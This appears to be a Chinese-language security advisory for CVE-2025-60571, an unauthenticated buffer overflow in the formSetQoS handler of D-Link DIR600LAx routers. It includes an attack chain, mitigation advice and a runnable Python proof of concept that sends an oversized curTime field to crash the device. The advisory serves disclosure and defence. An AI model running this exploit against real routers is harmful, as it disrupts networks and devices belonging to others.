CVE-2025-60571 D-Link DIR600LAx formSetQoS缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2025-60571

漏洞类型

缓冲区溢出

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

D-Link DIR600LAx

漏洞概述

CVE-2025-60571是D-Link DIR600LAx路由器固件中的一个高危缓冲区溢出漏洞。该漏洞存在于formSetQoS函数中，攻击者可以通过精心构造的curTime参数值触发缓冲区溢出条件。D-Link DIR600LAx是一款面向家庭和小型办公环境的有线路由器设备，广泛应用于中小型网络环境中。固件版本FW116WWb01被发现存在此安全缺陷，攻击者无需任何认证即可通过HTTP请求向受影响设备发送恶意数据。由于该漏洞位于路由器的QoS（服务质量）管理功能中，攻击者可能利用此漏洞造成设备拒绝服务，使路由器服务中断，影响网络的正常通信。此外，成功利用缓冲区溢出漏洞可能在特定条件下实现代码执行，从而完全控制受影响设备，窃取网络流量数据、修改路由器配置或将其纳入僵尸网络用于进一步的攻击活动。由于该漏洞无需认证即可利用，且CVSS评分达到7.5分，属于高危漏洞，建议受影响用户立即采取防护措施。

技术细节

该漏洞为典型的缓冲区溢出问题，存在于D-Link DIR600LAx路由器的formSetQoS函数中。漏洞的根本原因是在处理curTime参数时，程序未能对输入数据进行充分的边界检查，导致攻击者可以向该参数注入超出预期长度的数据。当路由器Web服务处理包含超长curTime值的HTTP请求时，过长的数据会覆盖相邻的内存区域，破坏程序的堆栈或堆结构。在启用了栈保护（Stack Canaries）或地址空间布局随机化（ASLR）的系统上，攻击者可能需要绕过这些安全机制才能实现代码执行；但即使无法完全控制程序流程，单纯的缓冲区溢出也足以导致路由器进程崩溃或触发拒绝服务条件。攻击者可以通过发送精心构造的POST请求到路由器的Web管理界面，利用QoS设置功能中的curTime参数传递超长字符串。路由器固件中的Web服务器通常以root权限运行，这意味着如果攻击者成功利用缓冲区溢出实现代码执行，将获得设备的完全控制权。漏洞影响的是路由器的服务质量（QoS）管理功能，该功能用于控制网络带宽分配和流量优先级。

攻击链分析

STEP 1

步骤1

攻击者识别目标D-Link DIR600LAx路由器，获取其IP地址

STEP 2

步骤2

攻击者构造包含超长curTime参数的恶意HTTP POST请求

STEP 3

步骤3

攻击者向路由器的formSetQoS端点发送恶意请求

STEP 4

步骤4

路由器Web服务处理请求时，curTime参数的超长数据触发缓冲区溢出

STEP 5

步骤5

溢出数据覆盖相邻内存，可能导致进程崩溃或代码执行

STEP 6

步骤6

如果成功利用，攻击者获得路由器完全控制权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-60571 PoC - D-Link DIR600LAx Buffer Overflow in formSetQoS
This PoC demonstrates the buffer overflow vulnerability via the curTime parameter.
Note: Use only for authorized security testing.
"""

import requests
import sys

target_ip = "192.168.0.1"  # Default D-Link router IP
target_port = 80

def exploit_buffer_overflow():
    """Exploit the buffer overflow in formSetQoS function via curTime parameter"""
    
    # Generate payload with oversized curTime parameter
    # The exact overflow length may vary; this is a demonstration
    overflow_length = 1000  # Adjust based on actual vulnerable buffer size
    payload = "A" * overflow_length
    
    url = f"http://{target_ip}:{target_port}/formSetQoS"
    
    # Construct the malicious request
    data = {
        "curTime": payload,
        "submit-url": "/QoS.asp"
    }
    
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0"
    }
    
    try:
        print(f"[*] Sending exploit payload to {url}")
        print(f"[*] Payload length: {len(payload)}")
        
        response = requests.post(url, data=data, headers=headers, timeout=10)
        
        print(f"[+] Response status: {response.status_code}")
        print(f"[*] Exploit sent. Check if device has crashed or rebooted.")
        
    except requests.exceptions.Timeout:
        print("[-] Request timed out - device may have crashed")
    except requests.exceptions.ConnectionError:
        print("[-] Connection failed - device may be unresponsive")
    except Exception as e:
        print(f"[-] Error: {str(e)}")

if __name__ == "__main__":
    if len(sys.argv) > 1:
        target_ip = sys.argv[1]
    exploit_buffer_overflow()

影响范围

D-Link DIR600LAx 固件版本 FW116WWb01

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）立即禁用路由器的远程管理功能，仅允许通过本地网络访问管理界面；2）在路由器前部署防火墙，限制对80和443端口的访问，只允许受信任的IP地址访问；3）定期检查路由器配置和固件版本，关注厂商安全公告；4）考虑使用VPN连接后再访问路由器管理界面；5）监控路由器运行状态，如发现异常重启或服务中断应及时排查；6）如果设备不再受厂商支持，建议更换为仍在接收安全更新的新型号路由器。